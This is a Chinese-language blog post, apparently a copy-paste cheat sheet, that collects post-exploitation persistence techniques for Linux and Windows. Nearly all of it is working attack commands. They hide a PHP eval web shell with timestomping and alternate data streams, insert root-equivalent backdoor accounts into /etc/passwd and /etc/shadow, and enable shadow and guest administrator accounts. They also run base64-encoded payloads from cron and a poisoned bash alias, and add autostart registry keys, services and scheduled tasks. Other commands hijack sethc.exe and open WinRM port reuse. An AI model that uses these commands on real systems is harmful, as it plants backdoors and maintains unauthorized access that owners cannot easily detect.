权限维持


隐匿文件

Linux

  • 内容隐藏
printf "<?=@eval(\$_REQUEST['code']);?>\r%-50s\n" > backup.php
  • 文件时间
touch -r index.php backup.php
touch -t 201406121017.34 backup.php
  • 文件锁定
chattr +i backup.php

Windows

  • 文件隐藏
attrib +s +a +h +r D:\PHPStudy\WWW\backup.php
  • ADS隐藏
#XP之后ADS文件无执行权限
echo ^<?=@eval($_REQUEST['code']);?^> > index.php:mm
  • 文件时间
(ls backup.php).CreationTime='2014-06-12 10:17:34'
(ls backup.php).LastWriteTime='2014-06-12 10:17:34'
(ls backup.php).LastAccessTime='2014-06-12 10:17:34'

用户管理

Linux

  • 普通账户
cp /bin/bash /bin/nologin && chmod u+s /bin/nologin
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
ssh usr@x.x.x.x -o UserKnownHostsFile=/dev/null -T /bin/nologin -ip
  • 系统账户
ln -s /bin/bash /bin/nologin
sed -i "3i\usr:x:0:0:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "3i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • 密钥登录
ssh-keygen -t rsa -f rsa_key -C flag
ln -s /bin/bash /bin/nologin && setcap cap_setuid+ep /bin/python
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:*:18375:0:99999:7:::" /etc/shadow
mkdir /usr/sbin/.ssh && echo "rsa" > /usr/sbin/.ssh/authorized_keys
python -c "import os, pty; os.setuid(0); pty.spawn('/bin/bash')"

Windows

  • 影子账户
#https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Create-Clone.ps1
Powershell -exec bypass Import-Module ./Create-Clone.ps1; Create-Clone -u usr$ -p admin@888.. -cu Administrator
  • 来宾账户
net user guest admin@888..
net user guest /active:yes
net localgroup administrators guest /add
  • VBS 脚本
UserName = WScript.Arguments(0)
PassWord = WScript.Arguments(1)
WinNT = "WinNT://" & CreateObject("WScript.Network").ComputerName
Set Admin = GetObject(WinNT & "/Administrators, Group")
If UCase(UserName) = "GUEST" Then
Set User = GetObject(WinNT & "/Guest")
User.AccountDisabled = FALSE
Else
Set User = GetObject(WinNT).Create("User", UserName)
End If
User.SetPassword PassWord
User.SetInfo
Admin.add WinNT & "/" & UserName

开机自启

Linux

  • 启动脚本
/etc/bashrc
/etc/profile
/etc/profile.d/*
/etc/rc.d/init.d/*
/etc/rc.d/rc.local
  • 计划任务
sed -i "\$i\\$(printf '59 23   * * *   root    echo d2hvYW1pCg== | base64 -d | bash &> /dev/null\r%-80s\n')" /etc/crontab
#/etc/cron.hourly--时, /etc/cron.daily--天, /etc/cron.weekly--周, /etc/cron.monthly--月
printf "echo d2hvYW1pCg== | base64 -d | bash &> /dev/null\r%-50s\n" > /etc/cron.daily/default && chmod 755 /etc/cron.daily/default

Windows

  • 注册表
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v StartUp /t REG_SZ /d "Shell" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v StartUp /t REG_SZ /d "Shell" /f
  • 登录脚本
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Public\Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,Shell" /f
  • 启动目录
#NT6以前
C:\Documents and Settings\All Users\Start Menu\Programs\StartUp
C:\Documents and Settings\%UserName%\Start Menu\Programs\StartUp
#NT6以后
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • 系统服务
sc create StartUp binPath= "Shell" start= "delayed-auto" obj= "LocalSystem"
sc description StartUp "对应用程序启动进行安全检查。"
  • 计划任务
#onStart--系统启动时, onLogon--用户登录时
schtasks /Create /tn "\Microsoft\Windows\StartUp\StartUp" /ru SYSTEM /sc onStart /tr "Shell"

进程劫持

Linux

  • alias后门
printf "alias pwd='\$(echo d2hvYW1pCg== | base64 -d | bash &> /dev/null)pwd'\r%-70s\n" >> ~/.bashrc && source ~/.bashrc

Windows

  • DLL劫持

  • 文件替换

takeown /A /F C:\Windows\System32\sethc.exe
cacls C:\Windows\System32\sethc.exe /E /G Everyone:F
cd C:\Windows\System32 && move sethc.exe sethc.bak && copy odbcad32.exe sethc.exe
  • 映像劫持
#直接触发执行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\odbcad32.exe" /f
#静默退出执行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "Shell" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f

端口复用

Linux

Windows

  • WinRM
#启动WinRM
winrm quickconfig ‐q
#启用端口复用
winrm set winrm/config/Service @{EnableCompatibilityHttpListener="true"}
#更改监听端口
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
#设置信任连接
winrm set winrm/config/Client @{TrustedHosts="*"}

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
系统提权 系统提权
╔═══════════════╗
║ “复制粘贴” 之系统提权 ║
╚═══════════════╝
2021-03-05
下一篇 
流量隧道 流量隧道
╔═══════════════╗
║ “复制粘贴” 之流量隧道 ║
╚═══════════════╝
2021-02-25
  目录